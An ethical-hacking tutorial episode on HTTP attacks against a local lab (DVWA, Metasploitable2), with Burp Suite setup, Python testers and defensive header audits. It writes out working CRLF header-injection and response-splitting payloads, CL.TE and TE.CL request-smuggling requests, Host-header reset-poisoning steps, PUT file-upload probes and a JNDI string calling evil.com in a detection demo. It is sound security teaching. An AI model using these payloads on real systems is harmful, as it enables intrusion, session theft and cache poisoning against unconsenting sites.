Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection

What will I learn

  • HTTP beyond the basics: methods, headers, status codes, and cookies from the attacker's perspective;
  • Request smuggling: exploiting disagreements between front-end and back-end servers;
  • Header injection: injecting headers to manipulate server behavior;
  • HTTP response splitting: injecting content into responses via header manipulation;
  • Host header attacks: cache poisoning and password reset hijacking;
  • Using Burp Suite to intercept, modify, and replay HTTP requests.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Your hacking lab from Episode 2 (Kali + DVWA);
  • Burp Suite Community Edition (pre-installed on Kali);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Beginner

Solutions to Episode 10 Exercises

Exercise 1 -- CVE research for Metasploitable2:

CVE-2011-2523 (vsftpd 2.3.4):
  CVSS: 10.0 | Vector: Network | Metasploit: exploit/unix/ftp/vsftpd_234_backdoor
  Fix: Upgrade to vsftpd 2.3.5+ (backdoor removed from source)

CVE-2010-2075 (UnrealIRCd 3.2.8.1):
  CVSS: 7.5 | Vector: Network | Metasploit: exploit/unix/irc/unreal_ircd_3281_backdoor
  Fix: Upgrade to UnrealIRCd 3.2.8.1.1+ (verify source hash after download)

CVE-2007-2447 (Samba 3.0.20-3.0.25rc3):
  CVSS: 6.0 | Vector: Network (authenticated) | Metasploit: exploit/multi/samba/usermap_script
  Fix: Upgrade to Samba 3.0.25+

Priority order: vsftpd FIRST (CVSS 10.0, unauthenticated, trivial to exploit,
gives root shell). Then UnrealIRCd (unauthenticated RCE). Samba last
(requires some authentication, lower CVSS).

The key insight: exploit prioritization is about impact AND difficulty. The vsftpd backdoor gives root access with zero complexity -- you literally type a smiley face. That's always first.

Exercise 2 -- patch_monitor.py:

import json, requests

def check_nvd(product, version):
    url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch={product}+{version}"
    resp = requests.get(url, timeout=15)
    data = resp.json()
    vulns = []
    for v in data.get('vulnerabilities', [])[:5]:
        cve = v['cve']
        cve_id = cve['id']
        score = 'N/A'
        for m in ['cvssMetricV31', 'cvssMetricV30']:
            if m in cve.get('metrics', {}):
                score = cve['metrics'][m][0]['cvssData']['baseScore']
                break
        vulns.append({'id': cve_id, 'score': score})
    return vulns

# Read services.json: [{"name": "Apache", "version": "2.2.8"}, ...]
with open('services.json') as f:
    services = json.load(f)
for svc in services:
    vulns = check_nvd(svc['name'], svc['version'])
    print(f"{svc['name']} {svc['version']}: {len(vulns)} CVEs found")
    for v in vulns:
        print(f"  {v['id']} (CVSS: {v['score']})")

The key insight: automated monitoring is essential because vulnerabilities are disclosed constantly. The NVD publishes roughly 2,000 new CVEs per month. No human can track that manually.

Exercise 3 -- Log4Shell analysis:

Timeline:
- Nov 24, 2021: Alibaba Cloud reports to Apache privately
- Dec 9: Public disclosure + PoC published
- Dec 10: Mass scanning/exploitation begins worldwide
- Dec 13: Apache releases Log4j 2.16.0 (first complete fix)
- Dec 18: Denial-of-service flaw (CVE-2021-45105) found in 2.16.0, fixed in 2.17.0
- Jan-Mar 2022: Continued exploitation of unpatched systems

Why critical (10.0): unauthenticated RCE via a LOG MESSAGE. Any
user-controlled string that reaches Log4j (HTTP headers, form fields,
usernames, search queries) triggers JNDI lookup -> LDAP -> attacker
server -> arbitrary class loading -> code execution.

Defense-in-depth that would have helped:
1. Egress filtering (block outbound LDAP connections from web servers)
2. Network segmentation (limit blast radius of compromised server)
3. WAF rules (detect ${jndi: patterns in input)
4. Runtime application self-protection (RASP)

The key insight: Log4Shell was catastrophic because logging is everywhere -- it's the ONE thing every application does. The attack surface was any input that eventually gets logged, which is basically all input.
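As a footnote on defense #3 (WAF rules): here's a minimal sketch of the kind of pattern such a rule might match. The regex below is my own loose illustration, not a production rule -- attackers bypassed naive ${jndi: filters with nested lookups almost immediately, which is why the gaps in the pattern are deliberately sloppy.

```python
import re

# Loose, illustrative Log4Shell probe detector (NOT a production WAF rule).
# The lazy gaps tolerate simple obfuscation like ${${lower:j}ndi:...}
JNDI_PATTERN = re.compile(r'\$\{.{0,30}?j.{0,5}?n.{0,5}?d.{0,5}?i.{0,30}?:', re.IGNORECASE)

def looks_like_log4shell(value: str) -> bool:
    """True if the string looks like a JNDI lookup probe."""
    return bool(JNDI_PATTERN.search(value))

print(looks_like_log4shell("${jndi:ldap://evil.com/a}"))    # True
print(looks_like_log4shell("${${lower:j}ndi:ldap://x/a}"))  # True -- caught by the loose gaps
print(looks_like_log4shell("normal search query"))          # False
```

Real WAFs normalize and decode input before matching; this only shows why "block the literal string ${jndi:" was never going to be enough.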


Welcome to Arc 2. For the next batch of episodes, we're going to systematically attack web applications -- the single largest attack surface on the internet. And we start with the protocol that makes it all work: HTTP.

We touched on HTTP in episode 3 when we looked at how the internet works from an attacker's perspective. We saw packets on the wire with Wireshark. We talked about TCP handshakes and DNS resolution. But that was 30,000 feet. Now we go deep. Because HTTP is deceptively simple on the surface but absolutely packed with ambiguities and quirks that attackers exploit every single day. When you understand HTTP at the raw byte level, web vulnerabilities stop being mysterious and start becoming obvious.

I should mention -- a lot of web developers I've worked with over the years (and trust me, I've worked with quite some) treat HTTP as this invisible thing that "just works." They fire off a fetch() call, get a response, done. They never look at the actual headers. They never think about what happens when a load balancer and a backend server disagree about the request format. And that's exactly the gap attackers walk through ;-)

HTTP from the Attacker's Perspective

Let's start by talking directly to a web server. No browser. No abstractions. Raw TCP:

# Connect to Metasploitable2's Apache and send a raw HTTP request
echo -e "GET / HTTP/1.1\r\nHost: 192.168.56.101\r\nUser-Agent: Scipio/1.0\r\nAccept: */*\r\nConnection: close\r\n\r\n" | nc 192.168.56.101 80

What comes back:

HTTP/1.1 200 OK
Date: Wed, 16 Apr 2026 14:00:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 891
Connection: close
Content-Type: text/html

<html>...

Every header leaks information. Server and X-Powered-By give exact versions -- which we can immediately look up in the vulnerability databases from episode 10. Content-Length tells us the response size. And Connection: close tells us the server closed the connection after responding.

This is the thing about HTTP that most people miss: headers are metadata that both sides exchange in plaintext (unless TLS is wrapping the connection, as we covered in episode 9). And that metadata tells you an enormous amount about the server's technology stack, configuration, and sometimes even its security posture. A server that sends X-Powered-By: PHP/5.2.4 is screaming "I haven't been updated since 2008" to anyone who listens.

Now let's get interesting.

HTTP Methods: More Than GET and POST

Most developers think HTTP has two methods: GET (read) and POST (write). In reality, HTTP defines several, and each one represents a potential attack vector when misconfigured:

# Check which methods the server supports
curl -X OPTIONS http://192.168.56.101/ -i

# Try PUT (upload a file -- if allowed, this is critical)
curl -X PUT http://192.168.56.101/test.txt -d "file content here" -i

# Try DELETE
curl -X DELETE http://192.168.56.101/test.txt -i

# TRACE (reflects request back -- can leak cookies and auth headers)
curl -X TRACE http://192.168.56.101/ -i

If PUT is enabled on a web server, you can upload files directly -- including web shells. A web shell is a script (usually PHP) that gives the attacker command execution on the server through their browser. One PUT request to upload a PHP file, one GET request to execute it, and you own the server. If TRACE is enabled, it echoes the full request back to the client including any cookies or authentication tokens the browser sent (a technique called Cross-Site Tracing, XST).

Metasploitable2's Apache has WebDAV enabled with PUT support. Try it:

# Upload a test file via PUT
curl -X PUT http://192.168.56.101/dav/test.txt -d "Uploaded by attacker"
curl http://192.168.56.101/dav/test.txt
# If it returns "Uploaded by attacker" -- you can write arbitrary files

If that worked, you've just confirmed arbitrary file write on the server. In a real engagement, the next step would be uploading a PHP web shell instead of a text file. We'll cover that in detail when we get to file upload vulnerabilities later in this arc. For now, the point is: HTTP methods beyond GET and POST are often enabled unnecessarily and represent a serious misconfiguration.

Having said that, modern web servers (nginx, Apache 2.4+) have much saner defaults. PUT and DELETE are typically disabled unless explicitly configured. But legacy systems, development servers that accidentally went to production, and IoT devices running embedded HTTP stacks -- these still pop up regularly in pentests.
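If you'd rather script this than run one-off curl commands, here's a rough Python sketch of the same method probing. The /dav/ path and the probe.txt filename are just the lab example from above; adjust for your target.

```python
#!/usr/bin/env python3
"""Probe risky HTTP methods against a target -- a scripted version
of the curl commands above."""

def probe_methods(target, http=None):
    """`http` defaults to the requests module; it's injectable so the
    logic can be exercised without network access."""
    if http is None:
        import requests
        http = requests
    results = {}
    # OPTIONS advertises supported methods via the Allow header (when honest)
    resp = http.options(target, timeout=5)
    results["OPTIONS"] = (resp.status_code, resp.headers.get("Allow", "not disclosed"))
    # 2xx on PUT/DELETE is a serious misconfiguration; 405 is the sane answer
    for method in ("PUT", "DELETE", "TRACE"):
        url = target if method == "TRACE" else target + "probe.txt"
        r = http.request(method, url,
                         data="probe" if method == "PUT" else None, timeout=5)
        results[method] = (r.status_code, r.reason)
    return results

if __name__ == "__main__":
    for method, info in probe_methods("http://192.168.56.101/dav/").items():
        print(f"{method:8} -> {info}")
```

Note that an OPTIONS response can lie -- some servers omit methods from Allow that they nevertheless accept, which is why the script probes PUT, DELETE, and TRACE directly instead of trusting the advertisement.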

Burp Suite: Your HTTP Microscope

Burp Suite is the most important web security tool after Nmap. It sits between your browser and the target as a proxy, letting you intercept, inspect, modify, and replay every HTTP request. If Nmap is your telescope for finding targets (episodes 4 and 5), Burp Suite is your microscope for examining what those targets do up close.

On your Kali VM:

burpsuite &
  1. Go to Proxy > Options -- confirm it's listening on 127.0.0.1:8080
  2. In Firefox: Settings > Network Settings > Manual proxy -- set HTTP proxy to 127.0.0.1 port 8080
  3. Browse to http://192.168.56.101/dvwa/
  4. In Burp, go to Proxy > Intercept -- you'll see every request

Now you can:

  • Modify requests before they're sent (change parameters, add headers, alter cookies)
  • Replay requests (Repeater tab -- change one thing, send again, compare responses)
  • Fuzz parameters (Intruder tab -- send hundreds of variations automatically)
  • Decode/encode data (Decoder tab -- base64, URL encoding, hex)

This is your primary tool for web application testing. Everything we do from here through the rest of Arc 2 will use Burp Suite. Get comfortable with it now -- especially the Repeater tab, which is where you'll spend most of your time. The workflow is: intercept a request in the Proxy, right-click "Send to Repeater", then modify and resend it as many times as you want while observing how the server responds to each variation.

One incredibly useful feature: the HTTP history in the Proxy tab records every request that went through the proxy. After browsing a web application for a few minutes, you'll have a complete map of every endpoint, every parameter, every cookie. This is passive reconnaissance through the proxy -- just USE the application normally and Burp records everything. We did active reconnaissance with Nmap in episode 5. Burp Suite gives us passive application-level recon for free.

Header Injection

HTTP headers are separated by \r\n (carriage return + line feed). If user input ends up in a response header without sanitization, an attacker can inject additional headers by embedding the CRLF sequence in their input:

Suppose a web app sets a redirect header based on user input:
  GET /redirect?url=https://example.com

Server generates:
  HTTP/1.1 302 Found
  Location: https://example.com

What if the attacker sends:
  GET /redirect?url=https://evil.com%0d%0aSet-Cookie:%20admin=true

Server generates:
  HTTP/1.1 302 Found
  Location: https://evil.com
  Set-Cookie: admin=true          <-- INJECTED HEADER!

The %0d%0a is URL-encoded \r\n -- the header separator. The attacker just set an arbitrary cookie in the victim's browser. If the application trusts that cookie for authorization (and you'd be surprised how many do), the attacker just escalated to admin with a single crafted URL.

This is called CRLF injection and it's the building block for several more advanced attacks. The root cause is always the same: user input ending up in HTTP headers without the CRLF characters being stripped or encoded. It sounds like an obvious thing to prevent, but remember what we discussed in episode 6 about AI-generated code -- frameworks that auto-generate redirect headers from user input don't always sanitize for CRLF. Never assume the framework does it for you.

Let's test header injection with a Python script:

#!/usr/bin/env python3
"""
Header injection tester -- checks if a URL parameter is reflected
in response headers without sanitization.
"""
import requests

target = "http://192.168.56.101/dvwa"

# Test for CRLF injection in redirect-style parameters. The endpoint path
# below is illustrative -- adjust it to whatever reflects input on your
# DVWA version. Note: the first two payloads are pre-URL-encoded; the third
# uses raw CRLF, which modern versions of requests may reject outright
# (the except block catches that).
payloads = [
    "test%0d%0aInjected-Header: true",
    "test%0d%0aSet-Cookie: hacked=yes",
    "test\r\nX-Injected: works",
]

for payload in payloads:
    try:
        resp = requests.get(f"{target}/vulnerabilities/redirect/?url={payload}",
                            allow_redirects=False, timeout=5)
        for header, value in resp.headers.items():
            if 'injected' in header.lower() or 'hacked' in value.lower():
                print("[+] Header injection confirmed!")
                print(f"    Payload: {payload}")
                print(f"    Injected: {header}: {value}")
    except Exception as e:
        print(f"[-] Error: {e}")

HTTP Response Splitting

Header injection gets more dangerous when you can inject a complete response. If you can inject enough CRLF sequences, you can terminate the first response entirely and start a second one:

GET /redirect?url=x%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>FAKE</html>

What the browser might see as TWO responses:
  Response 1: HTTP/1.1 302 Found\r\nLocation: x\r\n\r\n
  Response 2: HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>FAKE</html>

If there's a proxy or cache between the attacker and the server, the second "response" can get associated with the NEXT request that comes through that connection -- potentially a request from a completely different user. The attacker just poisoned the cache or hijacked another user's response. This is how header injection escalates from "set a cookie" to "serve malicious content to other users."

Modern HTTP frameworks and servers have gotten much better at preventing response splitting. Most web servers now strip or reject CRLF in header values by default. But older applications, custom HTTP implementations, and backend services that speak raw HTTP still get caught by this.
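You don't need a vulnerable server to see why splitting works -- it falls straight out of string concatenation. A toy demonstration (no network involved, just the bytes a naive server would emit):

```python
# Toy demonstration of why CRLF in a header value splits the response.

def build_redirect(location: str) -> bytes:
    """A naive server that drops user input straight into a header."""
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n\r\n".encode()

# Attacker-controlled value: terminate response 1, then start response 2
evil = ("x\r\n\r\n"
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>FAKE</html>")

raw = build_redirect(evil)
# A proxy parsing this byte stream sees TWO responses back to back:
parts = raw.split(b"\r\n\r\n")
print(parts[0].decode())   # response 1: 302 Found + Location: x
print(parts[1].decode())   # response 2: the injected 200 OK
```

The server called one function and wrote one response; the wire carries two. Everything downstream (proxies, caches, browsers) parses the wire, not the server's intent.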

HTTP Request Smuggling

Request smuggling is one of the most powerful and least understood web attacks. It exploits disagreements between front-end servers (load balancers, CDNs, reverse proxies) and back-end servers about where one request ends and the next one begins.

The root cause: HTTP/1.1 has TWO ways to specify the body length:

  • Content-Length: 42 (explicit byte count)
  • Transfer-Encoding: chunked (body split into chunks, terminated by 0\r\n)

What if a request contains BOTH headers? The RFC says Transfer-Encoding takes precedence. But not all servers agree. A front-end might use Content-Length while the back-end uses Transfer-Encoding -- or vice versa. This ambiguity is the entire vulnerability.
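To follow the CL.TE and TE.CL examples below byte by byte, it helps to see exactly what the chunked wire format looks like. A minimal encoder sketch:

```python
def chunked_encode(body: bytes, chunk_size: int = 8) -> bytes:
    """Minimal Transfer-Encoding: chunked encoder: each chunk is
    <hex length>\\r\\n<data>\\r\\n, terminated by a zero-length chunk."""
    out = b""
    for i in range(0, len(body), chunk_size):
        chunk = body[i:i + chunk_size]
        out += f"{len(chunk):x}\r\n".encode() + chunk + b"\r\n"
    return out + b"0\r\n\r\n"

print(chunked_encode(b"SMUGGLED"))
# b'8\r\nSMUGGLED\r\n0\r\n\r\n'
```

The chunk length is hexadecimal, and the `0\r\n\r\n` terminator is the only way a chunked parser knows the body has ended -- which is precisely the ambiguity the smuggling attacks below exploit.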

CL.TE Smuggling (front-end uses Content-Length, back-end uses Transfer-Encoding):

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

The front-end sees Content-Length: 13, forwards exactly 13 bytes (0\r\n\r\nSMUGGLED). The back-end processes the chunked encoding, sees 0\r\n\r\n (end of body), and treats SMUGGLED as the START of the NEXT request. The attacker just prepended data to another user's request.
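The byte accounting is worth verifying yourself:

```python
# Verify the byte arithmetic of the CL.TE example.
body = b"0\r\n\r\nSMUGGLED"
print(len(body))    # 13 -- exactly what Content-Length: 13 claims

# A Content-Length parser forwards all 13 bytes. A chunked parser
# stops at the zero-length chunk terminator:
terminator = b"0\r\n\r\n"
end = body.index(terminator) + len(terminator)
print(body[:end])   # b'0\r\n\r\n'  -- the (empty) chunked body
print(body[end:])   # b'SMUGGLED'   -- left on the wire, prefixes the next request
```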

Read that again. The attacker's data gets welded onto the front of someone else's request. If the smuggled data is GET /admin HTTP/1.1\r\nHost: vulnerable.com\r\n\r\n, the next user's legitimate request gets eaten and replaced with a request for the admin panel -- and the response goes back to THAT user. Or even better: the smuggled prefix captures the next user's request headers (including their session cookie) and reflects them somewhere the attacker can read.

TE.CL Smuggling (front-end uses Transfer-Encoding, back-end uses Content-Length):

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

The front-end processes chunked encoding (chunk of 8 bytes + terminator, forwards everything). The back-end uses Content-Length: 3, reads only 3 bytes (8\r\n), and the rest (SMUGGLED\r\n0\r\n\r\n) becomes the beginning of a new request in the connection pipeline.

What can you do with request smuggling?

  • Bypass security controls: the WAF sees one request, the back-end processes two
  • Poison the web cache: your smuggled request's response gets cached for the next user
  • Steal other users' requests: the smuggled prefix gets prepended to the next user's request, capturing their credentials or tokens
  • Redirect users: inject Host headers that change where responses go

Request smuggling is complex to exploit reliably, but the payoff is enormous. James Kettle's research at PortSwigger (the makers of Burp Suite) has documented critical smuggling vulnerabilities in major CDNs and cloud providers including Amazon ALB, Akamai, and Cloudflare. These aren't theoretical -- they affected millions of websites.

Here's a simple detection script to check for potential smuggling:

#!/usr/bin/env python3
"""
Basic HTTP request smuggling detector.
Sends ambiguous CL/TE requests and checks for timing differences.
"""
import socket
import time

def smuggle_test(host, port=80):
    """Test for CL.TE smuggling via timing difference."""
    # Normal request baseline (Content-Length matches the 3-byte body exactly)
    normal = (
        f"POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: 3\r\n"
        f"\r\n"
        f"x=1"
    ).encode()

    # CL.TE probe: Content-Length covers the 4 bytes "1\r\nx", but the
    # chunked body is deliberately left unterminated. A server honoring
    # Content-Length answers promptly; a server honoring Transfer-Encoding
    # keeps waiting for the chunk terminator -> timeout.
    probe = (
        f"POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: 4\r\n"
        f"Transfer-Encoding: chunked\r\n"
        f"\r\n"
        f"1\r\n"
        f"x"
    ).encode()

    for label, payload in [("normal", normal), ("CL.TE probe", probe)]:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(10)
            s.connect((host, port))
            start = time.time()
            s.sendall(payload)
            resp = s.recv(4096)
            elapsed = time.time() - start
            status = resp.split(b'\r\n')[0].decode() if resp else 'no response'
            print(f"  [{label}] {status} ({elapsed:.2f}s)")
            s.close()
        except socket.timeout:
            print(f"  [{label}] TIMEOUT (>10s) -- possible smuggling indicator")
        except Exception as e:
            print(f"  [{label}] Error: {e}")

print("[*] HTTP Request Smuggling Detection")
print("[*] Target: 192.168.56.101 (Metasploitable2)")
smuggle_test("192.168.56.101")

A significant timing difference between the normal request and the CL.TE probe (the probe takes much longer or times out) suggests the backend is trying to process chunked encoding while the frontend used Content-Length. That's the signature of a potential CL.TE smuggling vulnerability. Having said that, this is a very basic check -- real-world smuggling testing requires much more sophisticated probing and careful analysis of how the responses are desynchronized.

Host Header Attacks

The Host header tells the server which website you want. In virtual hosting (multiple sites on one IP), this is how the server knows which site to serve. But applications often trust the Host header for internal logic, and that trust is frequently misplaced:

# Normal request
curl -H "Host: example.com" http://192.168.56.101/ -i

# What if we send a different Host header?
curl -H "Host: evil-attacker.com" http://192.168.56.101/ -i

Attacks that exploit Host header trust:

Password reset poisoning: Application generates a reset link using the Host header:

Dear user,
Click here to reset your password:
https://{Host}/reset?token=abc123

Attacker requests a password reset for the victim's account but changes the Host header to evil-attacker.com. Victim receives a legitimate-looking email from the real application with:

https://evil-attacker.com/reset?token=abc123

Victim clicks because the email IS from the real application -- it just contains a link to the attacker's server. Attacker captures the reset token. Attacker resets the password. Game over.

This is one of those attacks that sounds far-fetched until you realise how many web frameworks build URLs from the Host header by default. Django's HttpRequest.build_absolute_uri() uses the Host header. Ruby on Rails' url_for uses it. Many password reset implementations just call these framework functions without a second thought. The fix is straightforward (whitelist allowed hostnames, use a hardcoded base URL for sensitive links) but the vulnerability persists because developers don't consider the Host header as untrusted input.
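In code, the vulnerable and safe patterns look like this. This is a hypothetical sketch -- the function names and the ALLOWED_HOSTS domains are invented for illustration, not taken from any particular framework:

```python
# Hypothetical sketch: building a password reset link from the Host header.

def reset_link_vulnerable(request_host: str, token: str) -> str:
    # Trusts the client-supplied Host header -- poisonable
    return f"https://{request_host}/reset?token={token}"

ALLOWED_HOSTS = {"example.com", "www.example.com"}  # assumption: your real domains

def reset_link_safe(request_host: str, token: str) -> str:
    # Whitelist the Host header; fall back to a hardcoded base domain
    host = request_host if request_host in ALLOWED_HOSTS else "example.com"
    return f"https://{host}/reset?token={token}"

print(reset_link_vulnerable("evil-attacker.com", "abc123"))
# https://evil-attacker.com/reset?token=abc123  -- token goes to the attacker
print(reset_link_safe("evil-attacker.com", "abc123"))
# https://example.com/reset?token=abc123
```

The even safer option is to never consult the Host header for sensitive links at all and use a configured base URL -- then there's nothing to whitelist.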

Cache poisoning: Attacker sends a request with Host: evil.com to a page that reflects the Host in links or asset URLs. If a CDN or caching proxy sits in front of the application, it caches this response. The next user who requests the same page gets served the cached version -- which is full of links and references to evil.com. The attacker just poisoned the cache for every user who visits that page.

This is exactly the pattern that James Kettle documented in his "Practical Web Cache Poisoning" research. He found that major websites were vulnerable because their caching layers keyed responses on the URL path but NOT on the Host header. Different Host header, same cache key, poisoned response served to everyone.

HTTP Security Headers: What's Missing Tells You Everything

When you're assessing a web application's security posture, the ABSENCE of certain headers is as telling as the presence of vulnerabilities. Here's a quick audit you can do against any target:

#!/usr/bin/env python3
"""
HTTP security header auditor -- checks for missing defensive headers.
"""
import requests
import sys

SECURITY_HEADERS = {
    'X-Content-Type-Options': {
        'expected': 'nosniff',
        'risk': 'Browser MIME-type sniffing can execute uploaded files as scripts'
    },
    'X-Frame-Options': {
        'expected': 'DENY or SAMEORIGIN',
        'risk': 'Page can be framed -- clickjacking attacks possible'
    },
    'Content-Security-Policy': {
        'expected': 'varies (restrict script sources)',
        'risk': 'No CSP -- XSS attacks have no browser-level mitigation'
    },
    'Strict-Transport-Security': {
        'expected': 'max-age=31536000; includeSubDomains',
        'risk': 'No HSTS -- downgrade attacks from HTTPS to HTTP possible'
    },
    'Referrer-Policy': {
        'expected': 'strict-origin-when-cross-origin',
        'risk': 'Full URL leaked in Referer header to third-party sites'
    },
}

def audit(url):
    requests.packages.urllib3.disable_warnings()  # suppress the verify=False warning
    resp = requests.get(url, timeout=10, verify=False)
    print(f"[*] Auditing: {url}")
    print(f"[*] Status: {resp.status_code}")
    print(f"[*] Server: {resp.headers.get('Server', 'not disclosed')}\n")

    missing = 0
    for header, info in SECURITY_HEADERS.items():
        value = resp.headers.get(header)
        if value:
            print(f"  [OK] {header}: {value}")
        else:
            missing += 1
            print(f"  [!!] {header}: MISSING")
            print(f"        Risk: {info['risk']}")
            print(f"        Should be: {info['expected']}")

    # Check for information leakage headers
    leaky = ['Server', 'X-Powered-By', 'X-AspNet-Version', 'X-AspNetMvc-Version']
    print(f"\n[*] Information leakage:")
    for h in leaky:
        v = resp.headers.get(h)
        if v:
            print(f"  [!!] {h}: {v} (reveals technology stack)")

    print(f"\n[*] Missing security headers: {missing}/{len(SECURITY_HEADERS)}")

if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.101"
    audit(target)

Run it against both targets:

# Audit Metasploitable2 (spoiler: it's missing everything)
python3 header_audit.py http://192.168.56.101

# Audit a modern site for comparison
python3 header_audit.py https://hive.blog

Running this against Metasploitable2 will show everything missing -- it's a deliberately vulnerable system from 2012. Running it against a modern production site will show you what proper header security looks like. The contrast is educational.

Cookies and Session Management from the Attacker's View

Before we wrap up, let's talk about one more critical aspect of HTTP: cookies. Cookies are how web applications maintain state (because HTTP itself is stateless -- each request is independent). After you log in, the server gives you a session cookie that says "this browser belongs to authenticated user X." Every subsequent request includes that cookie automatically.

The security attributes on cookies matter enormously:

Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict; Path=/

HttpOnly  -- JavaScript cannot read this cookie (prevents XSS cookie theft)
Secure    -- only sent over HTTPS (prevents interception on HTTP)
SameSite  -- controls when cookie is sent with cross-site requests
Path      -- limits which URLs receive the cookie

If ANY of these attributes are missing, the cookie is weaker than it needs to be:

  • No HttpOnly? XSS can steal it via document.cookie (we'll cover this in detail when we get to XSS).
  • No Secure? Cookie sent over plain HTTP -- anyone on the network can grab it (episode 3, Wireshark).
  • No SameSite? Cross-site request forgery becomes easier (that's a whole episode of its own coming later).

You can inspect cookie attributes in Burp Suite's response tab, or directly in your browser's developer tools. When testing a web application, the cookie configuration is one of the first things to check -- it tells you how seriously the developers take session security.
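You can also automate that first check. A small sketch that parses a raw Set-Cookie value (the kind you'd copy out of Burp's response tab) and flags missing attributes:

```python
"""Flag missing security attributes on a raw Set-Cookie header value."""

REQUIRED = ("HttpOnly", "Secure", "SameSite")

def audit_cookie(set_cookie: str) -> list:
    """Return the security attributes missing from a Set-Cookie value."""
    # Everything after the first ';' is attributes; compare case-insensitively
    attrs = {part.split("=")[0].strip().lower() for part in set_cookie.split(";")[1:]}
    return [a for a in REQUIRED if a.lower() not in attrs]

print(audit_cookie("session=abc123; HttpOnly; Secure; SameSite=Strict; Path=/"))
# []  -- nothing missing
print(audit_cookie("PHPSESSID=deadbeef; Path=/"))
# ['HttpOnly', 'Secure', 'SameSite']
```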

AI Slop Angle: HTTP Security

AI code assistants (continuing our running theme from episode 6) frequently generate HTTP handling code that's vulnerable:

  • No CSRF tokens on state-changing requests
  • Trusting the Host header for generating URLs (password reset poisoning, as we just discussed)
  • No Content-Type validation (accepting JSON when only form data is expected, or vice versa)
  • Missing security headers (no X-Content-Type-Options, X-Frame-Options, Content-Security-Policy)
  • CORS misconfiguration (reflecting arbitrary Origin values while setting Access-Control-Allow-Credentials: true -- which means any website can make authenticated requests to your API and read the responses; a blanket Access-Control-Allow-Origin: * is also sloppy, though browsers at least refuse to send credentials with it)

The AI generates code that "works" -- requests go through, responses come back, the application functions correctly. But the security properties are absent because they don't affect functionality. A password reset that works perfectly while also being vulnerable to Host header poisoning is still a working password reset. The vulnerability is invisible until someone exploits it.

This is going to be a recurring pattern throughout Arc 2. Almost every web vulnerability we cover exists because the application works correctly from a functional perspective while being broken from a security perspective. Security is a non-functional requirement, and non-functional requirements are exactly what gets dropped when developers (or AI assistants) optimize for "does it work?" instead of "is it safe?"

Exercises

Exercise 1: Set up Burp Suite as a proxy on your Kali VM. Browse to DVWA and log in. In Burp's Proxy history, find the login POST request. Using Burp Repeater, modify the request: change the User-Agent header to something custom, add a new header X-Custom: test, and change the username. Send it. What happens? Then try the same login request but remove the Cookie header entirely. Document: what does the server need from each header to process the login?

Exercise 2: Write a Python script called header_audit.py that takes a URL and checks for missing security headers. The script should make a GET request and verify the presence of: X-Content-Type-Options, X-Frame-Options, Content-Security-Policy, Strict-Transport-Security, X-XSS-Protection, and Referrer-Policy. For each missing header, print what the risk is and what the header should be set to. Test it against both Metasploitable2 (http) and a real HTTPS site.

Exercise 3: Using netcat (not curl, not a browser), manually craft and send three HTTP requests to Metasploitable2: (a) a GET request for the root page with custom headers, (b) a POST request with form data (Content-Type: application/x-www-form-urlencoded), and (c) a request using the OPTIONS method. For each, capture the full response and document every header the server sends back. Identify which headers leak information about the server's technology stack.


HTTP is simple -- Right? Rrrrright ;-)

@scipio


